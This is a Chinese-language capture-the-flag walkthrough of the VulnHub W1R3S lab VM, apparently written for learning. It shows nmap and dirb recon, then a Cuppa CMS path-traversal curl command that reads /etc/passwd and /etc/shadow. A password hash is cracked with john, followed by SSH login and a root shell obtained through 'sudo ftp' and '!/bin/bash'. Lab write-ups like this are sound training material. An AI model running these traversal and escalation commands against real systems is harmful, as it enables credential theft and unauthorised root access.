5-vulnhub W1R3S 1
下载地址为:https://www.vulnhub.com/entry/w1r3s-101,220/
本次的靶机ip为192.168.3.24(桥接模式自动获取)
目标:得到root权限 找到flag
一、信息搜集
1.扫描目标ip,这里使用arp-scan -l
2.扫描端口,这里使用nmap
命令为nmap -p 1-65535 -sV 192.168.3.24
nmap -p 1-65535 -sV 192.168.3.24
Starting Nmap 7.70 ( https://nmap.org ) at 2021-02-18 20:16 CST
Nmap scan report for 192.168.3.24
Host is up (0.00035s latency).
Not shown: 55528 filtered ports, 10003 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open mysql MySQL (unauthorized)
3.扫描目录,这里使用dirb:
---- Scanning URL: http://192.168.3.24/ ----
==> DIRECTORY: http://192.168.3.24/administrator/
- http://192.168.3.24/index.html (CODE:200|SIZE:11321)
==> DIRECTORY: http://192.168.3.24/javascript/ - http://192.168.3.24/server-status (CODE:403|SIZE:300)
==> DIRECTORY: http://192.168.3.24/wordpress/
(这里可以看出安装了wordpress)
4.搜集信息
Web 服务器 Apache 2.4.18 操作系统 Ubuntu
5.依次进行访问,得到信息
php版本为5.3、支持文件上传、得到cms为Cuppa CMS
6.目录扫描administrator
http://192.168.3.24/administrator/installation/这里是Cuppa CMS安装设置(这里可以目录扫描一波)
---- Scanning URL: http://192.168.3.24/administrator/ ----
==> DIRECTORY: http://192.168.3.24/administrator/alerts/
==> DIRECTORY: http://192.168.3.24/administrator/api/
==> DIRECTORY: http://192.168.3.24/administrator/classes/
==> DIRECTORY: http://192.168.3.24/administrator/components/
==> DIRECTORY: http://192.168.3.24/administrator/extensions/
- http://192.168.3.24/administrator/index.php (CODE:302|SIZE:6946)
==> DIRECTORY: http://192.168.3.24/administrator/installation/
==> DIRECTORY: http://192.168.3.24/administrator/js/
==> DIRECTORY: http://192.168.3.24/administrator/language/
==> DIRECTORY: http://192.168.3.24/administrator/media/ - http://192.168.3.24/administrator/robots.txt (CODE:200|SIZE:26)
==> DIRECTORY: http://192.168.3.24/administrator/templates/
二、getshell
1.搜索漏洞
这里既然知道了cms那么我们可以网上搜集一些他的漏洞如下:https://www.exploit-db.com/
根据提示尝试了一波发现读取不到文件http://192.168.3.24/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
2.使用curl进行读取
所以现在使用curl来进行读取(curl 是常用的命令行工具,用来请求 Web 服务器。它的名字就是客户端(client)的 URL 工具的意思。)
命令为:curl -s --data-urlencode 'urlConfig=../../../../../../../../../etc/passwd' http://192.168.3.24/administrator/alerts/alertConfigField.php
3.读取/etc/passwd 和/etc/shadow文件
找到了一个用户w1r3s,然后同样的方法读取/etc/shadow
命令为:curl -s --data-urlencode 'urlConfig=../../../../../../../../../etc/shadow' http://192.168.3.24/administrator/alerts/alertConfigField.php
4.使用破解工具john进行破解密码
既然已经知道shadow那么我们接下来可以使用破解工具john。
1).放进txt文件w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
2).使用工具:
3).破解成功:用户名:w1r3s 密码:computer
5.ssh连接
目前已经知道他开了22端口 那么我们现在可以进行连接ssh w1r3s@192.168.3.24
三、提权
1.信息搜集
首先信息搜集:uname -a
Linux W1R3S 4.13.0-36-generic #40~16.04.1-Ubuntu SMP Fri Feb 16 23:25:58 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
2.使用ftp提权:
sudo ftp
sudo: unable to resolve host W1R3S
ftp> !/bin/bash
root@W1R3S:~# whoami
root
root@W1R3S:~# id
uid=0(root) gid=0(root) groups=0(root)
这里可以尝试多种方法提权 均可成功!!
3.找到flag:
cd /root
cat flag.txt